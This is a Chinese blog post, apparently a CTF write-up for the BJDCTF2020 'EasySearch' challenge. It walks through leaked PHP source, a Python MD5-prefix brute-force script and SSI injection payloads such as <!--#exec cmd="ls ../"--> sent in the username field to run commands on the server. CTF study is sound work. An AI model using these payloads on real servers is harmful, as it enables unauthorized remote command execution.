BUU刷题记9

最新推荐文章于 2024-09-14 14:49:49 发布
最新推荐文章于 2024-09-14 14:49:49 发布
阅读量393 收藏
点赞数
分类专栏: BUU刷题记 文章标签: 服务器 哈希算法 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63957412/article/details/126493042
版权
本文详细介绍了Apache SSI漏洞的利用,通过dirsearch扫描发现后台源码泄露,分析PHP源码后找到密码校验的条件。利用MD5碰撞生成特定密码,结合SSI注入,最终实现远程命令执行。同时,文章提到了SSI注入的概念及其危害,并给出相关漏洞利用的脚本和payload示例,成功获取flag。
摘要由CSDN通过智能技术生成

[BJDCTF2020]EasySearch

知识点

Apache SSI(shtml)远程命令执行漏洞

  • BP抓包得到两个post参数username=a&password=a
  • 结合题目EasySearch,使用dirsearch扫描
  • 扫描到后台后swp文件泄露,访问一下得到源码
    在这里插入图片描述

源码:

<?php
	ob_start();					//打开缓冲区
	function get_hash(){		
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';//没有用到
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times				//生成5个随机字符
		$content = uniqid().$random;		//生成一个此随机数的唯一ID
		return sha1($content); 				//计算sha1散列
	}
    header("Content-Type: text/html;charset=utf-8");		//向客户端发送原始HTTP报头
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )  //username有值且不为空
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {			//如果获取的密码md5加密后前6位等于6d0bc1

            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";				//连接成文件路径
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");	//以写的方式打开此文件或者输出无法打开
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text); //将text内容写进shtml/将Text内容写进shtml
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

可以看到password的md5值的前六位要等于6d0bc1

脚本:

import hashlib

for i in range(100000000):
    a = hashlib.md5(str(i).encode("utf-8")).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)

在这里插入图片描述

随便选一个登录

在这里插入图片描述

shtml涉及SSI注入漏洞

SSI介绍

SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意命令。

  • 如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用 语法执行任意命令。

拓展:
使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。

password是固定的值,唯一可控的地方就是username,尝试在这里注入

访问给的url
在这里插入图片描述
继续构造payload:
在这里插入图片描述

  • 访问新的url
  • username=<!--#exec cmd="ls"-->&password=2020666
    在这里插入图片描述

没有线索,尝试返回上一层目录

  • username=<!--#exec cmd="ls ../"-->&password=2020666
    在这里插入图片描述

继续访问flag_990c66bf85a09c664f0b6741840499b2,得到flag

参考

夜幕下的灯火阑珊_题解
SSI注入漏洞

Kanyun7
关注
专栏目录
NO.2-30 [BJDCTF2020]EasySearch
nigo134的博客
08-03 115
sql注入没回显,扫描一下后台,最后用御剑扫描到了index.php.swp 进去是一段源代码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_r.
[BJDCTF2020]EasySearch之SSI注入
sGanYu
11-24 2510
开启靶机,题目提示easysearch,应该不是考SQL注入类型的题,然后利用御剑扫出了隐藏文件/index.php.swp,这个文件是一个临时交文件,用来备份缓冲区中的内容。如果文件正常退出,则自动删除此文件 访问获得源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'..
buu刷题
灰太的表格的博客
06-11 254
[HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_s
BUU刷题
as you know, nlp is fantasitc!
08-10 405
这个文章的知识点包括 sql注入中的异或盲注、preg_match的绕过(%0a绕过,prce限制)、basename去掉ascii码字符的情况。
BUU刷题2
Kanyun的博客
07-22 175
就是服务器端模板注入(Server-SideTemplateInjection)漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为Web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell等问题。其影响范围主要取决于模版引擎的复杂性。Pythontornadorender模板注入漏洞参考SSTI(模板注入)漏洞(入门篇)httpshttpshttps。...
BUU刷题1
Kanyun的博客
07-22 831
ps参数顺序要注意,ba位ab,flag会被检测出来)ctfping命令执行这一题好像在前端就进行了文件格式过滤,猜测在js中进行判断,尝试寻找js----->失败只能BP抓包修改后缀类型了判断注入点后,常规查询,发现部分关键字被绕过。...
BUU刷题3
Kanyun的博客
07-22 436
拿到题目f12查看源代码发现提示要成为admin随便注册个账号,登入后,在发现提示[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YXDpmoqd-1658472267522)(https于是下载源码。...
BUU刷题4
Kanyun的博客
07-23 852
在无回显的情况下,选择报错注入----updatexml()原因格式简单😂在GET传参时注意'#-->%23sql中的right()函数,可从右显示字段值一句话木马绕过
BUU刷题8
Kanyun的博客
08-18 455
开局尝试输入ID和Price购买发现除了ID为4其他的ID都会提示:如果输入ID为4,Price小于1337,会提示钱不够但是如果我们输入足够的Price,会提示如果我们上面参数都不输入直接提交,会出现报错我们注意到这个讯息,也就是说price参数只能是一个单独的Unicode字符我们了解一下这个方法功能把一个表示数字的字符串转为浮点数返回的函数注意: Unicode字符(chr),不是字符串这就是一道Unicode编码转问题。...
BUU刷题录②
Sapphire037的博客
08-24 294
[FBCTF2019]RCEService 不会做,看了wp不知道哪来的源码,用json格式传,知识点就是绕过preg_match的方法,回溯,数组(这题没用),行符%0A [Zer0pts2020]Can you guess it? 进入页面得到源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
BUU刷题录(三)
山高路远
04-10 3081
buu——pwn学习 十、铁人三项(第五赛区)_2018_rop checksec一下,开启了nx保护,然后拖入ida 呃。。。应该就是比较熟悉的rop的构建了,直接上exp吧,这类题目做挺多的了: 十一、gyctf_2020_borrowstack 先做下这题,一直想完整的了解栈迁移,借着这题真正的掌握栈迁移的手法和知识点吧,先checksec一下,再拖入ida分析 里面很简单,没有什么复杂的函数,很适合借此了解栈迁移!首先read函数读取的字节数不够,只能够刚好覆盖返回地址。第二输入点的位置是b
1.19buu刷题
missht0的博客
01-19 342
[网鼎杯 2018]Fakebook ssrf参考:https://www.freebuf.com/articles/web/260806.html wp参考:https://blog.csdn.net/weixin_43940853/article/details/105081522 遇事不决扫后台 robots.txt泄露源码 /user.php.bak,审计一下 //user.php.bak <?php class UserInfo { public $name = ""; pu
BUU刷题录-2020.11.7
Georgeiweb的博客
11-08 854
RSA 题目:给了两个文件,一个pub.key,另一个为flag.enc 解题思路:先把pub.key文件改为txt文件,然后就可以打开,内容是rsa的公钥, 所以直接使用在线工具解出e,n 公钥解析 然后在有n=p*q再用在线工具 factordb ...
裸金属服务器与云服务器的区别有哪些?
wanhengwangluo的博客
09-11 472
服务器通常是基于虚拟化技术,云服务器环境中的资源一般会受到其他虚拟机的影响,从而导致一定的波动,但是云服务器与裸金属服务器相比较来说,可以为企业提供更多的灵活性与可扩展性,同时整体的经济成本会较低一点,会更加适用于一些中小型企业和个人用户来进行使用。裸金属服务器相对于云服务器来说有着卓越的性能,因为没有虚拟化层的开销,可以直接访问底层硬件资源,以此来实现更高的计算性能、内存和存储容量,所以裸金属服务器一般会运用在需要处理大规模数据处理和高性能计算等任务当中。
高防服务器的优势与劣势分析
2403_86998484的博客
09-10 450
高防服务器通过持续监控和快速响应网络安全事件,极大地减少了由于网络攻击导致的服务中断,从而确保了业务的连续性。在网络安全威胁日益增加的今天,保障数据的安全是企业信誉的重要部分。高防服务器通常需要更多的资源来维护其高级的安全功能,包括硬件和软件的配置。这使得高防服务器的成本远高于标准服务器,可能需要更多的初期和持续的投资。高防服务器要求专业的知识和技能来进行正确的配置和维护。为了实现强大的安全防护,某些安全措施可能会对服务器的性能产生影响,例如,高强度的流量过滤可能会导致处理速度变慢,影响用户体验。
网站优化与服务器:性能提升的双重奏
最新发布
2403_86998484的博客
09-14 388
通过优化服务器配置、提升硬件性能、加强安全防护和实施有效的监控与维护,可以显著提升网站的性能和用户体验。网站优化是一个持续的过程,需要服务器和前端技术的协同配合,共同打造快速、稳定、安全的网站。在互联网高速发展的今天,网站的响应速度和用户体验直接影响着用户的留存率和转化率。而服务器作为网站运行的基石,其性能和配置对网站优化起着至关重要的作用。图片和媒体优化:压缩图片和视频,使用合适的格式和分辨率,加快加载速度。服务器的响应速度、稳定性和处理能力直接影响网站的加载时间和运行效率。
基于高通主板的ARM架构服务器
D404234的博客
09-11 1417
但高通在服务器市场面临激烈竞争,联发科在手机芯片市场挑战高通,苹果加快自研芯片使用步伐给高通压力,服务器市场英特尔占主导,高通要成功需克服诸多困难。高通在服务器芯片领域面临挑战,有收购与专利问题,博通收购后高通削减“非核心业务”支出,Intel 市占率高且 Arm 生态和软件不完善,高通在 Arm 服务器芯片市场进展不大,2018 年高通服务器芯片部门裁员约 280 名,占部门总人数一半左右,业务前景充满不确定性。易获取部署,众多供应商,90%主流软件适配,兼容性强,常见系统和程序可顺畅运行。
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置表对明文进行置。置表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值